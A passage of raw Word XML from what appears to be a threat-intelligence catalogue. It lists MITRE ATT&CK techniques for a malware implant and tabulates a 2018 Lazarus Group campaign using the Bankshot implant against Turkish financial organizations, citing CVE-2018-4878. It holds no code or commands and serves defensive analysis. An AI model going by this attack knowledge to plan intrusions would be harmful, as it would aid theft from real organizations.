        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After every action is performed the malware sends a response to the control server indicating whether the action was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFFD4D0" w14:textId="0783B326" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50"/>
    <w:p w14:paraId="627C654F" w14:textId="19465696" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:r>
        <w:t>[1] For this report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606DC2C0" w14:textId="77777777" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE ATT&amp;CK techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD52BA5" w14:textId="77777777" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exfiltration over </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>command and control</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F8485D" w14:textId="77777777" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Commonly used port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FCCF28" w14:textId="77777777" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Command-line interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA4144A" w14:textId="77777777" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Service execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAB1DCB" w14:textId="77777777" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Automated collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A2D673" w14:textId="77777777" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Data from local system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F09F497" w14:textId="77777777" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Process discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF8ED3F" w14:textId="77777777" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>System time discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B239B0" w14:textId="77777777" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Credential dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5C10CB" w14:textId="77777777" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation of vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD1F40" w14:textId="77777777" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Process injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A748119" w14:textId="5F2BA5AD" w:rsidR="00117F50" w:rsidRDefault="00117F50" w:rsidP="00117F50">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>File deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5710E5BD" w14:textId="333D6A7D" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="00F423B5"/>
    <w:p w14:paraId="562AFB3A" w14:textId="49F4B44A" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="00F423B5"/>
    <w:p w14:paraId="02583E2A" w14:textId="77777777" w:rsidR="00A1200B" w:rsidRDefault="00A1200B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="07718405" w14:textId="20915435" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="00F423B5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc153480885"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">T1566.001 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB679C">
        <w:t xml:space="preserve">Hidden Cobra Targets Turkish Financial Sector </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB679C">
        <w:t>With</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB679C">
        <w:t xml:space="preserve"> New Bankshot Implant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w14:paraId="28E265F2" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="00F423B5">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F423B5" w:rsidRPr="002D1D50" w14:paraId="384AAB4A" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="106DBC40" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CDB93BA" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EBF346A" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00387DCC" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="00B857D7" w14:paraId="766C2A6E" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2399F533" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64606BA9" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Lazarus Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="620F0CD5" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00387DCC" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="00B857D7" w14:paraId="7086D9B2" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EA4C31C" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="007328DE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01DDDA79" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="007328DE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">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37130A81" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00387DCC" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="00B857D7" w14:paraId="0B0CB876" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="005A628D" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26836975" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="007328DE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>North Korea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A7163C2" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00387DCC" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3F0D" w:rsidRPr="00B857D7" w14:paraId="308E5AC4" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="020D3613" w14:textId="77777777" w:rsidR="00FA3F0D" w:rsidRDefault="00FA3F0D" w:rsidP="00FA3F0D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FE03B03" w14:textId="6CC3908C" w:rsidR="00FA3F0D" w:rsidRDefault="00FA3F0D" w:rsidP="00FA3F0D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Turkey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6844C033" w14:textId="36F308AA" w:rsidR="00FA3F0D" w:rsidRPr="00387DCC" w:rsidRDefault="00FA3F0D" w:rsidP="00FA3F0D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3F0D" w:rsidRPr="00B857D7" w14:paraId="1A6BE44B" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="603CDCCE" w14:textId="77777777" w:rsidR="00FA3F0D" w:rsidRDefault="00FA3F0D" w:rsidP="00FA3F0D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19EFAF3E" w14:textId="24A0439E" w:rsidR="00FA3F0D" w:rsidRDefault="00FA3F0D" w:rsidP="00FA3F0D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="00205C19">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>inancial organizations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B22A04A" w14:textId="6F388F4D" w:rsidR="00FA3F0D" w:rsidRPr="00387DCC" w:rsidRDefault="00FA3F0D" w:rsidP="00FA3F0D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3F0D" w:rsidRPr="00B857D7" w14:paraId="1E5582EC" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3821C792" w14:textId="77777777" w:rsidR="00FA3F0D" w:rsidRDefault="00FA3F0D" w:rsidP="00FA3F0D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02F1F9F8" w14:textId="67DE7348" w:rsidR="00FA3F0D" w:rsidRDefault="00FA3F0D" w:rsidP="00FA3F0D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="180F4EFA" w14:textId="0F365483" w:rsidR="00FA3F0D" w:rsidRDefault="00FA3F0D" w:rsidP="00FA3F0D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] Access to finances or information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="00B857D7" w14:paraId="76C240E8" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="518C67C2" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12755705" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E0C97">
              <w:t>CVE-2018-4878</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A98109E" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="00B857D7" w14:paraId="4CFC5EB0" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1540F760" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="785ED159" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68923B5D" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873778" w:rsidRPr="00B857D7" w14:paraId="240A73E5" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35668A05" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39C9C52C" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C9DFD48"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26922F45" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="400CEFA2" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B51F2B7" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21D940A8" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="00B857D7" w14:paraId="003248C7" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08C9621A" w14:textId="6E927891" w:rsidR="00F423B5" w:rsidRDefault="001A38DD" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30C542F5" w14:textId="1B20D76D" w:rsidR="00F423B5" w:rsidRDefault="001A38DD" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="004C6CB5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AA67DBC" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A38DD" w:rsidRPr="00B857D7" w14:paraId="0D061458" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="031FAC5A" w14:textId="77777777" w:rsidR="001A38DD" w:rsidRDefault="001A38DD" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7123A56D" w14:textId="77777777" w:rsidR="001A38DD" w:rsidRDefault="001A38DD" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F8E314B" w14:textId="77777777" w:rsidR="001A38DD" w:rsidRDefault="001A38DD" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="241EA59B" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00AC7A85" w:rsidRDefault="00F423B5" w:rsidP="00F423B5"/>
    <w:p w14:paraId="46C3DE56" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="00F423B5">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9918" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1953"/>
        <w:gridCol w:w="2462"/>
        <w:gridCol w:w="663"/>
        <w:gridCol w:w="591"/>
        <w:gridCol w:w="555"/>
        <w:gridCol w:w="988"/>
        <w:gridCol w:w="2266"/>
